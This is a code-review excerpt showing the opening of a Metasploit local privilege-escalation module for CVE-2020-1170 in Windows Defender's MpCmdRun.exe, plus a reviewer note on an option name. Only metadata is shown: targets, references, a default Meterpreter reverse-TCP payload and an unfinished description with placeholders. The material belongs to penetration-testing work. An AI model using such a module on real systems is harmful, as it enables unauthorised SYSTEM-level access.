modules/exploits/windows/local/cve_2020_1170_windows_defender_lpe.rb

```diff
@@ -0,0 +1,219 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::EXE # Needed for generate_payload_dll
+  include Msf::Post::Windows::FileSystem
+  include Msf::Post::Windows::FileInfo # Needed to retrieve info on the file version for MpCmdRun.exe
+  include Msf::Post::Windows::ReflectiveDLLInjection
+  include Msf::Exploit::FileDropper
+  include Msf::Post::File
+
+  def initialize(info = {})
+    super(
+        update_info(
+          info,
+          'Name' => 'Windows Defender MpCmdRun.log Arbitrary Folder Deletion Vulnerability',
+          'Description' => %q{
+            This module exploits CVE-2020-1170, an arbitrary folder deletion vulnerability in Windows Defender's
+            MpCmdRun.exe binary on MpCmdRun.exe versions prior to 4.18.2005.1 to delete the folder at XXXX. This then
+            allows an attacker to do XXXX, which grants them code execution as the SYSTEM user. Note that this module
+            will not work if another AV is installed on the target as this will disable Windows Defender.
+          },
+          'License' => MSF_LICENSE,
+          'Author' =>
+              [
+                'itm4n', # Original bug finder
+                'gwillcox-r7' # msf module
+              ],
+          'Platform' => ['win'],
+          'SessionTypes' => ['meterpreter'],
+          'Privileged' => true,
+          'Arch' => [ARCH_X86, ARCH_X64],
+          'Targets' =>
+              [
+                [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],
+              ],
+          'DefaultTarget' => 0,
+          'DisclosureDate' => '2020-06-09',
+          'References' =>
+              [
+                ['CVE', '2020-1170'],
+                ['URL', 'https://itm4n.github.io/cve-2020-1170-windows-defender-eop/'],
+                ['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html'],
+              ],
+          'Notes' =>
+              {
+                'SideEffects' => [ ARTIFACTS_ON_DISK ],
+                'Reliability' => [ REPEATABLE_SESSION ],
+                'Stability' => [ CRASH_SAFE ]
+              },
+          'DefaultOptions' =>
+              {
+                'EXITFUNC' => 'thread',
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
+                'WfsDelay' => 900
+              }
+        )
+    )
+    register_options(
+        [
+            OptString.new('WriteableDirectory', [ true, 'The location of a directory the current user can write to', "C:\\Windows\\Temp\\" ]),
```

Comment:
`WritableDir` is convention, which also happens to overlap with a CmdStager setting.

Reply:
Thanks changing now